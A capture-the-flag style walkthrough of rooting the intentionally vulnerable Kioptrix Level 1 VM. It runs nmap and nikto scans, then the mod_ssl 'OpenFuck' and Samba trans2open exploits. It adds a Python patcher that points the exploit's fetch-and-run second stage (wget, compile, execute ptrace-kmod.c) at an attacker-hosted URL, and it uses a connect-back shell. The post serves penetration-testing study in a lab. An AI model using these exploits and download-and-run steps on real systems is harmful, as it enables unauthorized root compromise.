VulnHub - Kioptrix Level 1

I was looking around at various people who did a review of the PWK course and OSCP exam, and many of them had a list of VMs they used to prepare.

There are quite a few VMs on VulnHub that are similar to what you will find in the PWK lab, and the Kioptrix series is one of them.

Kioptrix is aimed at beginners, giving them a taste of what pentesting / hacking really is, and yes, don't be deluded by Hollywood. It is not as glamorous as they make it out to be in the movies. It's hard work, can sometimes be tedious work, and LOTS and LOTS of research. You will have plenty of late nights breaking your keyboard over your head.

But if you are serious about being part of this community, then you just have to follow Offensive Security's infamous quote that strikes fear, confusion and anger into their students...

“Try harder…”

A lot of people think that is not helpful, and that is why they fail. No one will do your work for you. No one will root that box for you. No one will modify that exploit for you, and no one will run that SQLi for you because you don't understand how SQL statements work.

You have to put in all the work and you will reap the benefits. Don’t expect to be spoon fed.

These “walkthroughs” that I'll be doing are to help people who really are trying and are struggling with a problem. By just copying and pasting commands without understanding what they do and how they work, you will never be anything more than a script kiddie.

Anyway... for those not scared away, here is what I did to root Kioptrix Level 1.

## Objective

The Kioptrix series is aimed at beginners and thus the challenges are pretty easy. The objective is getting root access to the VM via any means possible, except by hacking the actual VM client. The purpose of these vulnerable VMs is to learn the basic techniques and tools used in penetration tests. There is more than one way of achieving the objective in this challenge.

The Kioptrix Level 1 VM can be downloaded from here. Note that it is a VMware image and can be used in VMware Workstation or Player. You can convert the image to work on VirtualBox.

## The Hack

The first step in every penetration test is intelligence gathering. This consists of passive / active recon and enumeration: find out which services on the target are exposed to the network and which versions they run, so that you can search for known vulnerabilities in those versions.

To achieve this we will be using a tool that will become the foundation of your pentesting toolkit: Nmap. The nmap man page can be found here; it explains all the options / flags / arguments. In the scan below, -sV probes each open port to identify the service and its version, -A additionally enables OS detection, the default NSE scripts and traceroute, and -p- scans all 65535 TCP ports instead of nmap's default top 1000. The full port range is what makes the scan take over four minutes, but it is worth the wait: a service on a non-standard port (like 1024/tcp here) is easy to miss otherwise.

apb@stratios:~$ nmap -sV -A -p- 192.168.163.131

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 16:45 SAST
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.75% done; ETC: 16:46 (0:00:00 remaining)
Nmap scan report for 192.168.163.131
Host is up (0.0026s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: WMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-01-18T15:02:04+00:00; +16m44s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
Host script results:
|_clock-skew: mean: 16m43s, deviation: 0s, median: 16m43s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 268.36 seconds

The output above shows which ports are open on the target, what services are listening on them and which versions they run. Three stand out immediately: port 22 (SSH), 80 (HTTP) and 139 (Samba).

All of them are very old versions and are “low hanging fruit”. I started with port 22 / SSH, for which there did seem to be an exploit, but did not get far with that.

Right onto the next one. Port 80 / http.

First I ran nikto against the host to see if it finds any known vulnerabilities on port 80.

apb@stratios:~$ nikto -h 192.168.163.131
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.163.131
+ Target Hostname:    192.168.163.131
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 05:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8345 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2018-01-18 18:32:35 (GMT2) (41 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We are looking for something that allows remote code execution, a remote buffer overflow or a remote shell, and the following looks promising.

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Now we know that the host is running a very old version of apache with a vulnerable mod_ssl module. We can use this information to search for exploits.

Offensive Security hosts and maintains the online exploit database https://www.exploit-db.com/. A local copy of this database ships with Kali, so we can use the searchsploit command to search it offline.

apb@stratios:~$ searchsploit apache mod_ssl
---------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                            |  Path  (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                                                                           | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                                                                | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                                      | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow                                                                                    | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                                                              | exploits/unix/remote/40347.txt

Based on the versions, there are two exploits that could be useful.

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow

Excuse their names; I did not name them. The people who created the exploit did, and unfortunately the name is crude but accurate, because that is what happens to you if you are vulnerable to this exploit.

Unfortunately the exploit did not work “out of the box” and I had to make some changes.

On Kali, install the OpenSSL 1.0 development package (the exploit was written against the old OpenSSL API):

root@stratios:~# apt-get install libssl1.0-dev

Next we have to make two changes to the exploit before we can compile it: add two OpenSSL headers, and fix the download URL of the second-stage exploit embedded in this one. OpenFuck only gets you a shell as the web server user; once it has that shell it runs wget on the target to fetch ptrace-kmod.c (a local privilege escalation for the 2.4 kernel), compiles it and runs it to get root. That means the URL must be one the target itself can reach.

Copy the exploit to the /tmp directory so that we can edit it.

root@stratios:/tmp# cp /usr/share/exploitdb/exploits/unix/remote/764.c /tmp/

Add the headers above the other openssl headers at the top of the file.

#include <openssl/md5.h>
#include <openssl/rc4.h>

Search the file for wget and you will find the line that downloads ptrace-kmod.c from packetstormsecurity. That link no longer works. Replace it with the following one (if the target has no route to the internet, host ptrace-kmod.c on your own machine instead and point the wget at that):

https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Now we can go ahead and compile the exploit.

root@stratios:/tmp#  gcc -o OpenFsck 764.c -lcrypto
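The two edits above are easy to get wrong by hand, and the download URL is the one thing you will change again on every engagement (the target has to reach it, not your Kali box). The script below is an added example, not code from the original post or from exploit-db: it applies both edits to a copy of 764.c and lets you substitute any URL for the second stage. The `SAMPLE_764` text is a constructed stand-in for the relevant lines of 764.c, not the real file, and `192.168.163.128` is assumed to be the attacking machine's address as elsewhere in this walkthrough.

```python
"""Patch OpenFuckV2 (exploit-db 764.c): add the two missing OpenSSL headers and
rewrite the URL of the ptrace-kmod.c second stage that the exploit fetches on the
target. Added example for this walkthrough, not part of the exploit itself."""
import re
import sys

HEADERS = ("#include <openssl/md5.h>", "#include <openssl/rc4.h>")
DEFAULT_URL = "https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c"

# Any http(s) URL whose path ends in ptrace-kmod.c, whatever host it points at,
# so the patch works regardless of which dead mirror the copy of 764.c names.
PTRACE_URL_RE = re.compile(r"""https?://[^\s;"']*?/ptrace-kmod\.c""")


def patch_openfuck(source: str, url: str = DEFAULT_URL) -> str:
    """Return the patched source. Running it twice is harmless: headers that are
    already present are not added again, and the URL is simply rewritten again."""
    lines = source.splitlines(keepends=True)
    missing = [h for h in HEADERS if h not in source]
    if missing:
        # Insert the missing headers directly above the first <openssl/...> include.
        for i, line in enumerate(lines):
            if line.startswith("#include <openssl/"):
                lines[i:i] = [h + "\n" for h in missing]
                break
        else:
            raise ValueError("no OpenSSL include found; is this really 764.c?")
    patched = "".join(lines)
    patched, n = PTRACE_URL_RE.subn(url, patched)
    if n == 0:
        raise ValueError("no ptrace-kmod.c download URL found; nothing to fix")
    return patched


# Constructed stand-in for the handful of lines of 764.c that matter here.
# The real file has many more includes and a different (dead) download host.
SAMPLE_764 = (
    "#include <stdio.h>\n"
    "#include <openssl/ssl.h>\n"
    "#include <openssl/rsa.h>\n"
    '#define COMMAND2 "unset HISTFILE; cd /tmp; '
    "wget http://old.example/0304-exploits/ptrace-kmod.c; "
    'gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \\n"\n'
)


def main(argv):
    if len(argv) < 2:
        # No file given: show the effect on the constructed sample.
        print(patch_openfuck(SAMPLE_764, "http://192.168.163.128/ptrace-kmod.c"), end="")
        return 0
    path = argv[1]
    url = argv[2] if len(argv) > 2 else DEFAULT_URL
    with open(path) as f:
        src = f.read()
    with open(path, "w") as f:
        f.write(patch_openfuck(src, url))
    print(f"patched {path}; the target will fetch the second stage from {url}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Usage: `python3 patch_openfuck.py /tmp/764.c http://192.168.163.128/ptrace-kmod.c`, then serve ptrace-kmod.c from a directory on the attacking machine with `python3 -m http.server 80`, and compile as above with `gcc -o OpenFsck 764.c -lcrypto`. Serving the file yourself over plain HTTP sidesteps both the dead mirror and the 2001-era wget/TLS stack on the target.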

First run ./OpenFsck without arguments to see the usage and the numbered list of targets. 0x6b is the entry for Red Hat 7.2 with apache-1.3.20 (the list has two entries for it; if one does not give you a shell, try the other), and -c 50 tells it to open 50 connections before sending the shellcode.

Run the exploit.

root@stratios:~# ./OpenFsck 0x6b 192.168.163.131 -c 50

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--13:21:23--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

13:21:24 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 7346
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

And there we go. A root shell on the target machine.

Since they said there are multiple ways to get into this vm, we will carry on and look for another way.

Next we will try Samba. Since nmap did not give us a version number, let's connect to it and see what the server announces.

root@stratios:~# smbclient -L=192.168.163.131
WARNING: The "syslog" option is deprecated
Enter root's password:
Server does not support EXTENDED_SECURITY  but 'client use spnego = yes and 'client ntlmv2 auth = yes'
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

Great, we have a version. Use searchsploit again to look for an exploit.

apb@stratios:~$ searchsploit samba 2.2.1
Exploits: No Result
Shellcodes: No Result

Hmmm okay, nothing. searchsploit matches the text of the exploit titles, and no title contains “2.2.1”. Let's try again with a less specific version.

apb@stratios:~$ searchsploit samba 2.2
---------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                      |  Path
                                                                                                                                                    | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation                                                                                                           | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                                                                                        | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)                                                                             | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)                                                                                   | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation                                                                     | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)                                                                                 | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)                                                                                   | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)                                                                             | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution                                                                                           | exploits/linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                                                                                          | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)                                                                                          | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)                                                                                          | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)                                                                                          | exploits/unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)                                                                                                | exploits/linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow                                                                             | exploits/unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow                                                                                                                | exploits/linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                                                                                                   | exploits/multiple/remote/10.c
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------

Nothing specifically for 2.2.1, but since we know which version the target is running, we can compare it against the version ranges in the list, and there is a match.

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

Any version below 2.2.8 is affected, and ours (2.2.1a) falls in that range. So let's give it a try.

Copy the exploit to /tmp and compile.

apb@stratios:~$ cp /usr/share/exploitdb/exploits/multiple/remote/10.c /tmp/
apb@stratios:/tmp$ gcc 10.c

Run the exploit. -b 0 selects bruteforce mode for a Linux target, and -c 192.168.163.128 is the address of our attacking machine: the payload connects back to it, and the exploit itself listens for that connection and hands us the shell.

apb@stratios:/tmp$  ./a.out -b 0 -c 192.168.163.128 192.168.163.131
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

Another root shell; note that it carries smbd's identity (uid 0, but supplementary group nobody). They also left a flag on the system as proof that you got root. It can be found in root's mail, which you can read with mutt or by cat'ing /var/mail/root:

Received: (from root@localhost)
        by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
        for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

From root  Thu Jan 18 07:50:24 2018
Return-Path: <root@kioptrix.level1>
Received: (from root@localhost)
        by kioptrix.level1 (8.11.6/8.11.6) id w0ICoOl01319
        for root; Thu, 18 Jan 2018 07:50:24 -0500
Date: Thu, 18 Jan 2018 07:50:24 -0500
From: root <root@kioptrix.level1>
Message-Id: <201801181250.w0ICoOl01319@kioptrix.level1>
To: root@kioptrix.level1
Subject: LogWatch for kioptrix.level1

And there you have it. Granted this was a very easy box, but that was the point, to get people started and not scare them away.

Hope this was helpful to you in some way.

Thanks for reading.
